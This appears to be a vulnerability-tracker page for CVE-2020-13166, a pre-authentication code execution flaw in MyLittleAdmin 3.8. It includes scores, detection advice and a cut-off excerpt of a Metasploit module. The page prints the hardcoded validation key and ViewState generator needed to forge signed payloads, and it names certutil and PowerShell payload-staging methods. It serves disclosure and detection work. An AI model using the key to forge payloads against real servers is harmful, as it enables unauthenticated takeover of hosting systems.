CVE-2020-13166
published 2020-05-19CVE-2020-13166: The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers'…
PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
77.64%
99.5th percentile
The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mylittletools | mylittleadmin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf
- →Detect exploitation attempts by monitoring HTTP POST requests to myLittleAdmin (default port 8401/TCP) containing a `__VIEWSTATE` parameter; a crafted ViewState signed with the hardcoded machineKey will trigger a 302 redirect to /error/index.html on successful exploitation. ↗
- →Alert on HTTP responses containing 'myLittleAdmin for SQL Server' on port 8401 to identify exposed vulnerable instances. ↗
- →Monitor for processes spawned by IUSRPLESK_sqladmin (the SQL Admin MSSQL anonymous account under Plesk) as an indicator of post-exploitation activity. ↗
- →The exploit uses CmdStager flavors psh_invokewebrequest, certutil, and vbs for payload staging; monitor for certutil.exe or PowerShell Invoke-WebRequest activity originating from the myLittleAdmin process. ↗
- →The hardcoded __VIEWSTATEGENERATOR value CA0B0334 in HTTP requests to myLittleAdmin is a strong indicator of exploitation using the known hardcoded machineKey. ↗
- ·The hardcoded machineKey (validationKey) is the same across ALL myLittleAdmin 3.8 installations, meaning any instance is exploitable without prior authentication or customer-specific knowledge. ↗
- ·Plesk installs myLittleAdmin automatically during 'full' installation as an optional component, broadening the attack surface to all Plesk Obsidian full installs with myLittleAdmin 3.8. ↗
- ·SSL is enabled by default in the Metasploit module; defenders should ensure TLS inspection is in place on port 8401 to detect malicious ViewState payloads in transit. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
exploitdb·2020-05-25
CVE-2020-13166 Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule
VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
#
VIEWSTATE_VALIDATION_KEY =
"\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
"\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
"\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
"\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::ViewState
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
up
Metasploit
Plesk/myLittleAdmin ViewState .NET Deserialization
metasploit
Plesk/myLittleAdmin ViewState .NET Deserialization
Plesk/myLittleAdmin ViewState .NET Deserialization
This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded parameters in the web.config file for ASP.NET. Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup. Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account." Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.htmlhttps://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.htmlhttps://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/
2020-05-19
Published